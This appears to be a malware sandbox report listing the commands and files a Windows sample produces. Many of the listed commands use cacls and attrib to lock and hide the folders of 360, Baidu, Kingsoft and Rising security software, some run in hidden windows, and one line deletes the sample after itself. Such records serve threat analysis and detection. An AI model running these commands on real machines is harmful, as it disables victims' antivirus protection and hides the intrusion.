Technical Information
- nul
- %TEMP%\aut2809.tmp
- %WINDIR%\help\360x64-2345.txt
- %TEMP%\aut2809.tmp
- %WINDIR%\help\360x64-2345.txt
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\kingsoft" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\Baidu\BrowserProtect"
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360\360Safe\ipc\galaxy2.dat" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\ipc\galaxy2.dat" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360\360Safe\deepscan\speedmem2.hgt" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\deepscan\speedmem2.hgt" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360\360Safe\360ss2.dat" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\360ss2.dat" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360\360Safe\ipc\galaxy2.datt"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\ipc\galaxy2.datt" >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\deepscan\speedmem2.hg" >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\Baidu\BaiduAn" /c /p everyone:n
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360\360Safe\360ss2.dat"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\360ss2.dat" >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\ksafe" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\ksafe" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\kingsoft" /c /p everyone:n
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\Rising" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Rising" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\Baidu\BaiduSd" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Baidu\BaiduAn" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Baidu\BaiduSd" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\kingsoft" >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\360\360sd" /c /p everyone:n
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\kingsoft" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\ksafe" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\ksafe"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Rising" >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 1&del /q "<Full path to file>"
- '%WINDIR%\syswow64\regini.exe' %WINDIR%\Help\360x64-2345.txt
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\kingsoft"
- '<SYSTEM32>\regini.exe' %WINDIR%\Help\360x64-2345.txt
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\ksafe" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\ksafe" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\Baidu\BaiduSd" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\kingsoft" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\Rising" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Rising" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Baidu\BaiduSd" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360\360sd" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\Baidu\BaiduAn" /c /p everyone:n
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\360" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%CommonProgramFiles%\Baidu\BaiduProtect1.3" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%CommonProgramFiles%\Baidu\BaiduProtect1.3" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360\360Safe\deepscan\speedmem2.hg"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BrowserProtect" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\Baidu\BaiduSd"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BaiduSd" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\Baidu\BaiduAn"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BaiduAn" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\Rising"
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Baidu\BaiduAn" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%ProgramFiles%\360\360Safe" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\kingsoft" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360\360Safe" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\Baidu\BaiduSd"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360\360sd" >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360\360Safe" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360\360sd"
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360\360Safe"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\360"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\360"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360" >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\360\360Safe"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BaiduSd" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\Baidu"
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\Baidu\BaiduAn"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BaiduAn" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\Rising"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Rising" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\ksafe"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\ksafe" >nul 2>nul
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\kingsoft"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BrowserProtect" >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360sd" >nul 2>nul
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 1
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles%\360\360sd"
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cacls.exe' "%CommonProgramFiles(x86)%\Baidu\BaiduProtect1.3" /c /p everyone:n
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360\360sd" /c /p everyone:n
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360" /c /p everyone:n
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
- '<SYSTEM32>\cacls.exe' "%ProgramFiles(x86)%\360\360Safe" /c /p everyone:n
- '<SYSTEM32>\attrib.exe' +a +s +h +r "%ProgramFiles(x86)%\Baidu\BrowserProtect"
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%CommonProgramFiles(x86)%\Baidu\BaiduProtect1.3" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360sd" /c /p everyone:n >nul 2>nul
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\kingsoft" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360sd" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Baidu\BaiduAn" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Rising" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Baidu\BaiduSd" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BaiduSd" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\ksafe" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\deepscan\speedmem2.hg" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%CommonProgramFiles%\Baidu\BaiduProtect1.3" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Rising" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\ksafe" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\kingsoft" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Baidu\BaiduAn" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\Baidu\BaiduSd" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\Rising" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BrowserProtect" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BaiduAn" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\Baidu\BrowserProtect" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\ksafe" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\360ss2.dat" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360sd" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\kingsoft" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\360ss2.dat" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\deepscan\speedmem2.hgt" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360\360Safe" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%CommonProgramFiles(x86)%\Baidu\BaiduProtect1.3" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360\360Safe" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe\ipc\galaxy2.dat" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\ksafe" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 1&del /q "<Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Rising" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BaiduAn" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\360\360Safe" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\Baidu\BaiduSd" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles(x86)%\kingsoft" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles%\360\360sd" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe" >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo y|cacls "%programfiles%\360\360sd" /c /p everyone:n >nul 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +h +r "%programfiles(x86)%\360\360Safe\ipc\galaxy2.datt" >nul 2>nul' (with hidden window)